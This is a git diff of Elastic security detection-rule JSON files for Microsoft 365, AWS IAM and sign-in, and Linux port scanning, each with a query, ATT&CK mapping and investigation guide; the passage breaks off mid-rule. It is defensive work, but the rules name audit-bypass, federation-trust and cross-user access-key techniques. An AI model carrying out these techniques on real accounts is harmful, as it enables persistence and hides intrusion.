a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_207.json b/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_207.json deleted file mode 100644 index 3239255a301..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/675239ea-c1bc-4467-a6d3-b9e2cc7f676d_207.json +++ /dev/null @@ -1,92 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. 
Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account.", - "false_positives": [ - "Legitimate allowlisting of noisy accounts" - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "O365 Mailbox Audit Logging Bypass", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating O365 Mailbox Audit Logging Bypass\n\nIn Microsoft 365 environments, mailbox audit logging is crucial for tracking user activities like accessing or deleting emails. However, administrators can exempt certain accounts from logging to reduce noise, which attackers might exploit to hide their actions. The detection rule identifies successful attempts to create such exemptions, signaling potential misuse of this bypass mechanism.\n\n### Possible investigation steps\n\n- Review the event logs for entries with event.dataset set to o365.audit and event.provider set to Exchange to confirm the presence of the Set-MailboxAuditBypassAssociation action.\n- Identify the account associated with the event.action Set-MailboxAuditBypassAssociation and verify if it is a known and authorized account for creating audit bypass associations.\n- Check the event.outcome field to ensure the action was successful and determine if there are any other related unsuccessful attempts that might indicate trial and error by an attacker.\n- Investigate the history of the account involved in the bypass association to identify any unusual or suspicious activities, such as recent changes in permissions or unexpected login locations.\n- Cross-reference the account with any known third-party tools or lawful monitoring accounts to determine if the bypass is legitimate or potentially malicious.\n- Assess the risk and impact of the bypass by evaluating the types of activities that would no longer be logged for the account in question, considering the organization's security policies and compliance requirements.\n\n### False positive analysis\n\n- Authorized third-party tools may generate a high volume of mailbox audit log entries, leading to bypass associations being set. Review and document these tools to ensure they are legitimate and necessary for business operations.\n- Accounts used for lawful monitoring might be exempted from logging to reduce noise. Verify that these accounts are properly documented and that their activities align with organizational policies.\n- Regularly review the list of accounts with bypass associations to ensure that only necessary and approved accounts are included. 
Remove any accounts that no longer require exemptions.\n- Implement a process for periodically auditing bypass associations to detect any unauthorized changes or additions, ensuring that only intended accounts are exempted from logging.\n- Consider setting up alerts for any new bypass associations to quickly identify and investigate potential misuse or unauthorized changes.\n\n### Response and remediation\n\n- Immediately isolate the account associated with the successful Set-MailboxAuditBypassAssociation event to prevent further unauthorized actions.\n- Review and revoke any unauthorized mailbox audit bypass associations to ensure all relevant activities are logged.\n- Conduct a thorough audit of recent activities performed by the affected account to identify any suspicious or malicious actions that may have been concealed.\n- Reset credentials for the compromised account and any other accounts that may have been affected to prevent further unauthorized access.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Implement additional monitoring for similar bypass attempts to enhance detection capabilities and prevent recurrence.\n- Consider escalating the incident to a higher security tier or external cybersecurity experts if the scope of the breach is extensive or if internal resources are insufficient to handle the threat.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Set-MailboxAuditBypassAssociation and event.outcome:success\n", - "references": [ - "https://twitter.com/misconfig/status/1476144066807140355" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_208.json b/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_208.json deleted file mode 100644 index 9fb31a48b43..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/684554fc-0777-47ce-8c9b-3d01f198d7f8_208.json +++ /dev/null @@ -1,98 +0,0 @@ -{ - "attributes": { - "author": [ - 
"Austin Songer" - ], - "description": "Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider.", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "New or Modified Federation Domain", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating New or Modified Federation Domain\n\nFederation domains enable trust between Office 365 and external identity providers, facilitating seamless authentication. Adversaries may exploit this by altering federation settings to redirect authentication flows, potentially gaining unauthorized access. The detection rule monitors specific actions like domain modifications, signaling potential privilege escalation attempts, and alerts analysts to investigate these changes.\n\n### Possible investigation steps\n\n- Review the event logs for the specific actions listed in the query, such as \"Set-AcceptedDomain\" or \"Add-FederatedDomain\", to identify the exact changes made to the federation domain settings.\n- Identify the user account associated with the event by examining the event logs, and verify if the account has the necessary permissions to perform such actions.\n- Check the event.outcome field to confirm the success of the action and cross-reference with any recent administrative changes or requests to validate legitimacy.\n- Investigate the event.provider and event.category fields to ensure the actions were performed through legitimate channels and not via unauthorized or suspicious methods.\n- Analyze the timing and frequency of the federation domain changes to detect any unusual patterns or repeated attempts that could indicate malicious activity.\n- Correlate the detected changes with any recent alerts or incidents involving privilege escalation or unauthorized access attempts to assess potential links or broader security implications.\n\n### False positive analysis\n\n- Routine administrative changes to federation domains by IT staff can trigger alerts. To manage this, create exceptions for known and scheduled maintenance activities by trusted administrators.\n- Automated scripts or tools used for domain management may cause false positives. Identify these scripts and exclude their actions from triggering alerts by whitelisting their associated accounts or IP addresses.\n- Integration of new services or applications that require federation domain modifications can be mistaken for suspicious activity. Document these integrations and adjust the rule to recognize these legitimate changes.\n- Changes made during organizational restructuring, such as mergers or acquisitions, might appear as unauthorized modifications. Coordinate with relevant departments to anticipate these changes and temporarily adjust monitoring thresholds or exclusions.\n- Regular audits or compliance checks that involve domain settings adjustments can lead to false positives. Schedule these audits and inform the security team to prevent unnecessary alerts.\n\n### Response and remediation\n\n- Immediately disable any newly added or modified federation domains to prevent unauthorized access. 
This can be done using the appropriate administrative tools in Office 365.\n- Review and revoke any suspicious or unauthorized access tokens or sessions that may have been issued through the compromised federation domain.\n- Conduct a thorough audit of recent administrative actions and access logs to identify any unauthorized changes or access patterns related to the federation domain modifications.\n- Escalate the incident to the security operations team for further investigation and to determine if additional containment measures are necessary.\n- Implement additional monitoring on federation domain settings to detect any further unauthorized changes promptly.\n- Communicate with affected stakeholders and provide guidance on any immediate actions they need to take, such as password resets or additional authentication steps.\n- Review and update federation domain policies and configurations to ensure they align with best practices and reduce the risk of similar incidents in the future.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Set-AcceptedDomain\" or\n\"Set-MsolDomainFederationSettings\" or \"Add-FederatedDomain\" or \"New-AcceptedDomain\" or \"Remove-AcceptedDomain\" or \"Remove-FederatedDomain\") and\nevent.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-accepteddomain?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-federateddomain?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/exchange/new-accepteddomain?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/exchange/add-federateddomain?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/exchange/set-accepteddomain?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/msonline/set-msoldomainfederationsettings?view=azureadps-1.0" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "684554fc-0777-47ce-8c9b-3d01f198d7f8", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1484", - "name": "Domain or Tenant Policy Modification", - "reference": "https://attack.mitre.org/techniques/T1484/", - "subtechnique": [ - { - "id": "T1484.002", - "name": "Trust Modification", - "reference": "https://attack.mitre.org/techniques/T1484/002/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 208 - }, - "id": "684554fc-0777-47ce-8c9b-3d01f198d7f8_208", - "type": "security-rule" -} \ No newline at end of file diff --git 
a/packages/security_detection_engine/kibana/security_rule/696015ef-718e-40ff-ac4a-cc2ba88dbeeb_8.json b/packages/security_detection_engine/kibana/security_rule/696015ef-718e-40ff-ac4a-cc2ba88dbeeb_8.json new file mode 100644 index 00000000000..e54cb93b1a3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/696015ef-718e-40ff-ac4a-cc2ba88dbeeb_8.json @@ -0,0 +1,112 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary with access to a set of compromised credentials may attempt to persist or escalate privileges by creating a new set of credentials for an existing user. This rule looks for use of the IAM `CreateAccessKey` API operation to create new programmatic access keys for another IAM user.", + "false_positives": [ + "While this can be normal behavior, it should be investigated to ensure validity. Verify whether the user identity should be using the IAM `CreateAccessKey` for the targeted user." + ], + "from": "now-6m", + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "user.target.name", + "event.action", + "event.outcome", + "cloud.region", + "cloud.account.id", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "esql", + "license": "Elastic License v2", + "name": "AWS IAM User Created Access Keys For Another User", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n\n### Investigating AWS IAM User Created Access Keys For Another User\n\nAWS IAM access keys are long-term credentials that grant programmatic access to AWS resources. The `iam:CreateAccessKey` permission allows an IAM principal to generate new access keys for an existing IAM user. \nWhile this operation can be legitimate (for example, credential rotation), it can also be abused to establish persistence or privilege escalation if one user creates keys for another account without authorization.\n\nThis rule identifies `CreateAccessKey` API calls where the calling user (`aws.cloudtrail.user_identity.arn`) differs from the target user (`aws.cloudtrail.request_parameters.userName`), indicating one IAM identity creating credentials for another.\n\n#### Possible investigation steps\n\n- **Confirm both user identities and intent.** \n Identify the calling user (who performed `CreateAccessKey`) and the target user (whose access key was created). Contact both account owners or application teams to confirm if this operation was expected.\n\n- **Review CloudTrail event details.** \n Check the following fields directly in the alert or corresponding CloudTrail record: \n - `source.ip` \u2014 does it align with expected corporate ranges or known admin automation? \n - `user_agent.original` \u2014 AWS Console, CLI, SDK, or custom client? Unexpected user agents (for example, non-SDK scripts) may indicate manual or unauthorized use. 
\n - `source.geo` fields \u2014 verify the location details are expected for the identity.\n\n- **Correlate with related IAM activity.** \n In CloudTrail, search for subsequent or nearby events such as: \n - `AttachUserPolicy`, `AttachGroupPolicy`, `UpdateAssumeRolePolicy`, or `CreateUser`. \n These can indicate privilege escalation or lateral movement. \n Also review whether the same principal recently performed `CreateAccessKey` for multiple users or repeated this action across accounts.\n\n- **Inspect the new access key\u2019s usage.** \n Search for the newly created key ID (`aws.cloudtrail.response_elements.accessKey.accessKeyId`) in CloudTrail events following creation. Determine if it was used from unusual IP addresses, geographies, or services. \n\n- **Assess the risk of credential compromise.** \n If you suspect malicious behavior, consider the following indicators: \n - A non-admin user invoking `CreateAccessKey` for another user. \n - Creation outside of normal automation pipelines. \n - Use of the new key from a different IP or AWS account soon after creation.\n\n- **Scope related activity.** \n Review all activity from the calling user in the past 24\u201348 hours, focusing on `iam:*` API calls and resource creation events. \n Correlate any S3, EC2, or KMS access attempts made using the new key to identify potential impact or data exposure.\n\n### False positive analysis\n\n- **Expected credential rotation.** \n Some environments delegate credential rotation responsibilities to centralized automation or specific admin roles. Confirm if the calling user is authorized for such actions. \n- **Administrative workflows.** \n Account provisioning systems may legitimately create keys on behalf of users. Check for standard tags, automation tools, or user agents that indicate managed operations. \n- **Service-linked roles or external IAM automation.** \n Some AWS services create or rotate credentials automatically. Validate if the caller is a service-linked role or an automation IAM role used by a known deployment process.\n\n### Response and remediation\n\n> AWS IR playbooks classify unauthorized credential creation as a **Priority-1 incident** because it may allow persistence or privilege escalation. \n> The following steps scale for organizations with or without a dedicated IR team.\n\n**1. Immediate containment**\n- Deactivate or delete the access key from the target IAM user immediately using the AWS Console, CLI, or API (`DeleteAccessKey`). \n- Rotate or reset credentials for both the calling and target users to eliminate possible compromise. \n- Restrict risky principals. Temporarily deny `iam:CreateAccessKey` and `iam:UpdateAccessKey` permissions for non-administrative roles while scoping the incident. \n- Enable or confirm MFA on both accounts involved, if not already enforced.\n\n**2. Evidence preservation**\n- Export all related `CreateAccessKey`, `DeleteAccessKey`, and `UpdateAccessKey` events within \u00b130 minutes of the alert to an evidence bucket. \n- Preserve CloudTrail, GuardDuty, and AWS Config data for the same period. \n- Record key event details: caller ARN, target user, `accessKeyId`, `source.ip`, `userAgent`, and timestamps.\n\n**3. Scoping and investigation**\n- Search CloudTrail for usage of the new access key ID after creation. Identify any API activity or data access tied to it. \n- Review IAM policy changes, group modifications, or new role assumptions around the same time. 
\n- Determine if any additional credentials or trust policy changes were made by the same actor. \n- Check for GuardDuty findings referencing anomalous credential usage or suspicious API behavior.\n\n**4. Recovery and hardening**\n- Remove or disable any unauthorized keys and re-enable only verified credentials. \n- Implement least-privilege IAM policies to limit which users can perform `CreateAccessKey`. \n- Monitor for future `CreateAccessKey` events where `userIdentity.arn != request_parameters.userName`. \n- Ensure CloudTrail, GuardDuty, and Security Hub are active across all regions. \n- Educate administrative users on secure key rotation processes and the risk of cross-user key creation. \n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/):** Reference \u201cCredential Compromise\u201d and \u201cIAM Misuse\u201d procedures for containment and recovery. \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/):** See \u201cIdentity Access Review\u201d and \u201cUnauthorized Access Key Creation\u201d for example response flows. \n- **AWS Documentation:** [Best practices for managing access keys](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html). \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/). \n", + "query": "from logs-aws.cloudtrail-* metadata _id, _version, _index\n| where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"iam.amazonaws.com\"\n and event.action == \"CreateAccessKey\"\n and event.outcome == \"success\"\n and user.name != user.target.name\n| keep\n @timestamp,\n cloud.account.id,\n cloud.region,\n event.provider,\n event.action,\n event.outcome,\n event.dataset,\n user.name,\n source.address,\n source.ip,\n user.target.name,\n user_agent.original,\n aws.cloudtrail.request_parameters,\n aws.cloudtrail.response_elements,\n aws.cloudtrail.user_identity.arn,\n aws.cloudtrail.user_identity.type,\n aws.cloudtrail.user_identity.access_key_id,\n source.geo.*\n", + "references": [ + "https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/#iamcreateaccesskey", + "https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence", + "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud", + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateAccessKey.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "risk_score": 47, + "rule_id": "696015ef-718e-40ff-ac4a-cc2ba88dbeeb", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.001", + "name": "Additional Cloud Credentials", + "reference": "https://attack.mitre.org/techniques/T1098/001/" + } + ] + } + 
] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.001", + "name": "Additional Cloud Credentials", + "reference": "https://attack.mitre.org/techniques/T1098/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 8 + }, + "id": "696015ef-718e-40ff-ac4a-cc2ba88dbeeb_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_210.json b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_210.json new file mode 100644 index 00000000000..6aa9ff79bf3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_210.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a password recovery request for the AWS account root user. In AWS, the PasswordRecoveryRequested event from signin.amazonaws.com applies to the root user\u2019s \u201cForgot your password?\u201d flow. Other identity types, like IAM and federated users, do not generate this event. This alert indicates that someone initiated the root password reset workflow for this account. Verify whether this was an expected action and review identity provider notifications/email to confirm legitimacy.", + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.response_elements" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS Sign-In Root Password Recovery Requested", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS Sign-In Root Password Recovery Requested\n\nIn AWS, a `PasswordRecoveryRequested` event from `signin.amazonaws.com` is only generated for the root user during the \u201cForgot your password?\u201d workflow. Other identity types (IAM or federated users) do not trigger this event. A root password recovery request is a critical identity security event that could indicate a legitimate recovery by the account owner or a malicious attempt to gain full administrative access.\n\n### Possible investigation steps\n\n- **Verify the event details.** \n Review the alert fields (`source.ip`, `user_agent.original`, `cloud.region`, and `@timestamp`) to confirm when and from where the request originated.\n- **Confirm legitimacy.** \n Contact the account owner or credential custodian to verify whether they initiated the password recovery. 
\n  AWS will also send an email notification to the root account email address; check whether the owner received and acknowledged this.\n- **Check CloudTrail for related events.** \n  Search for any subsequent `ConsoleLogin` events for the root user, or IAM changes (for example, `CreateAccessKey`, `CreateUser`, or `AttachUserPolicy`) shortly after the recovery request.\n- **Assess IP reputation and location.** \n  Validate whether the `source.ip` aligns with known admin networks or expected geographies. \n  Suspicious indicators include foreign IPs, anonymization services, or unfamiliar user agents.\n- **Correlate with other alerts.** \n  Review other AWS security detections (for example, root logins, MFA disablement, or IAM policy changes) around the same timeframe.\n\n### False positive analysis\n\n- **Expected maintenance activity.** \n  If the root account owner confirms that the password reset was intentional (for example, for account recovery or planned credential rotation), the alert may be safely dismissed. \n- **Testing or account verification.** \n  Security or compliance teams occasionally test password recovery flows. Confirm via ticketing or planned maintenance documentation.\n\n### Response and remediation\n\n**1. Immediate actions**\n- **If confirmed legitimate:** \n  - Ensure that MFA is enabled and operational for the root account. \n  - Encourage rotation of the root password if not recently updated. \n- **If unconfirmed or suspicious:** \n  - Immediately reset the root password using the legitimate AWS recovery email link. \n  - Review the AWS account\u2019s email for password-recovery notifications and secure that inbox (change its password, enable MFA). \n  - Check for new successful root logins or unexpected IAM changes since the recovery attempt. \n\n**2. Evidence preservation**\n- Export the `PasswordRecoveryRequested` event from CloudTrail (\u00b130 minutes). \n- Preserve all `signin.amazonaws.com` and root `ConsoleLogin` events for the next 24 hours. \n- Store this evidence in a restricted S3 bucket with Object Lock enabled.\n\n**3. Scoping and investigation**\n- Review all root-level activities within the past 24\u201348 hours. \n  Focus on administrative actions such as `CreateAccessKey`, `UpdateAccountPasswordPolicy`, or `DisableMFA`. \n- Correlate with GuardDuty findings and AWS Config change history for any unauthorized modifications.\n\n**4. Recovery and hardening**\n- Confirm MFA is enforced on the root account. \n- Rotate all root credentials and ensure no access keys exist for the root user (root keys should never be active). \n- Secure the associated email account (password reset notifications are sent there). \n- Enable CloudTrail, GuardDuty, Security Hub, and AWS Config across all regions. \n- Review account recovery procedures to ensure multiple custodians are aware of the legitimate process.\n\n### Additional information\n\n- **AWS Incident Response Playbooks:** \n  See [`IRP-Credential-Compromise.md`](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/IRP-CredCompromise.md) for procedures related to root account credential recovery and unauthorized access attempts. \n- **AWS Customer Playbook Framework:** \n  See [`Compromised_IAM_Credentials.md`](https://github.com/aws-samples/aws-customer-playbook-framework/blob/a8c7b313636b406a375952ac00b2d68e89a991f2/docs/Compromised_IAM_Credentials.md) for guidance on containment, evidence collection, and recovery validation. 
\n- **AWS Documentation:** [AWS account root user best practices](https://docs.aws.amazon.com/IAM/latest/UserGuide/root-user-best-practices.html). \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/). \n", + "query": "event.dataset:aws.cloudtrail and \nevent.provider:signin.amazonaws.com and \nevent.action:PasswordRecoveryRequested and \nevent.outcome:success\n", + "references": [ + "https://web.archive.org/web/20230930161727/https://www.cadosecurity.com/an-ongoing-aws-phishing-campaign/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "69c420e8-6c9e-4d28-86c0-8a2be2d1e78c", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Sign-In", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 210 + }, + "id": "69c420e8-6c9e-4d28-86c0-8a2be2d1e78c_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6b341d03-1d63-41ac-841a-2009c86959ca_4.json b/packages/security_detection_engine/kibana/security_rule/6b341d03-1d63-41ac-841a-2009c86959ca_4.json deleted file mode 100644 index a788cd5431e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/6b341d03-1d63-41ac-841a-2009c86959ca_4.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects potential port scanning activity from a compromised host. Port scanning is a common reconnaissance technique used by attackers to identify open ports and services on a target system. A compromised host may exhibit port scanning behavior when an attacker is attempting to map out the network topology, identify vulnerable services, or prepare for further exploitation. This rule identifies potential port scanning activity by monitoring network connection attempts from a single host to a large number of ports within a short time frame. ESQL rules have limited fields available in its alert documents. Make sure to review the original documents to aid in the investigation of this alert.", - "from": "now-61m", - "interval": "1h", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential Port Scanning Activity from Compromised Host", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. 
While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Port Scanning Activity from Compromised Host\n\nPort scanning is a reconnaissance method used by attackers to identify open ports and services on a network, often as a precursor to exploitation. In Linux environments, compromised hosts may perform rapid connection attempts to numerous ports, signaling potential scanning activity. The detection rule identifies such behavior by analyzing network logs for a high number of distinct port connections from a single host within a short timeframe, indicating possible malicious intent.\n\n### Possible investigation steps\n\n- Review the network logs to identify the specific host exhibiting the port scanning behavior by examining the destination.ip and process.executable fields.\n- Analyze the @timestamp field to determine the exact time frame of the scanning activity and correlate it with any other suspicious activities or alerts from the same host.\n- Investigate the process.executable field to understand which application or service initiated the connection attempts, and verify if it is a legitimate process or potentially malicious.\n- Check the destination.port field to identify the range and types of ports targeted by the scanning activity, which may provide insights into the attacker's objectives or the services they are interested in.\n- Assess the host's security posture by reviewing recent changes, installed software, and user activity to determine if the host has been compromised or if the scanning is part of legitimate network operations.\n- Consult the original documents and logs for additional context and details that may not be captured in the alert to aid in a comprehensive investigation.\n\n### False positive analysis\n\n- Legitimate network scanning tools used by system administrators for network maintenance or security assessments can trigger this rule. To handle this, identify and whitelist the IP addresses or processes associated with these tools.\n- Automated vulnerability scanners or monitoring systems that perform regular checks on network services may cause false positives. Exclude these systems by creating exceptions for their known IP addresses or process names.\n- High-volume legitimate services that open multiple connections to different ports, such as load balancers or proxy servers, might be flagged. Review and exclude these services by specifying their IP addresses or process executables.\n- Development or testing environments where frequent port scanning is part of routine operations can be mistakenly identified. Implement exceptions for these environments by excluding their specific network segments or host identifiers.\n- Scheduled network discovery tasks that are part of IT operations can mimic port scanning behavior. 
Document and exclude these tasks by setting up time-based exceptions or identifying their unique process signatures.\n\n### Response and remediation\n\n- Isolate the compromised host from the network immediately to prevent further scanning and potential lateral movement.\n- Terminate any suspicious processes identified by the process.executable field to halt ongoing malicious activities.\n- Conduct a thorough review of the compromised host's system logs and network traffic to identify any unauthorized access or data exfiltration attempts.\n- Patch and update all software and services on the compromised host to close any vulnerabilities that may have been exploited.\n- Change all credentials associated with the compromised host and any potentially affected systems to prevent unauthorized access.\n- Monitor the network for any further signs of scanning activity or other suspicious behavior from other hosts, indicating potential additional compromises.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems are affected.\n", - "query": "from logs-endpoint.events.network-*\n| keep @timestamp, host.os.type, event.type, event.action, destination.port, process.executable, destination.ip, agent.id, host.name\n| where @timestamp > now() - 1 hours\n| where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\"\n| stats cc = count(), port_count = count_distinct(destination.port), agent_count = count_distinct(agent.id), host.name = VALUES(host.name), agent.id = VALUES(agent.id) by process.executable, destination.ip\n| where agent_count == 1 and port_count > 100\n| sort cc asc\n| limit 100\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "risk_score": 21, - "rule_id": "6b341d03-1d63-41ac-841a-2009c86959ca", - "setup": "## Setup\n\nThis rule requires 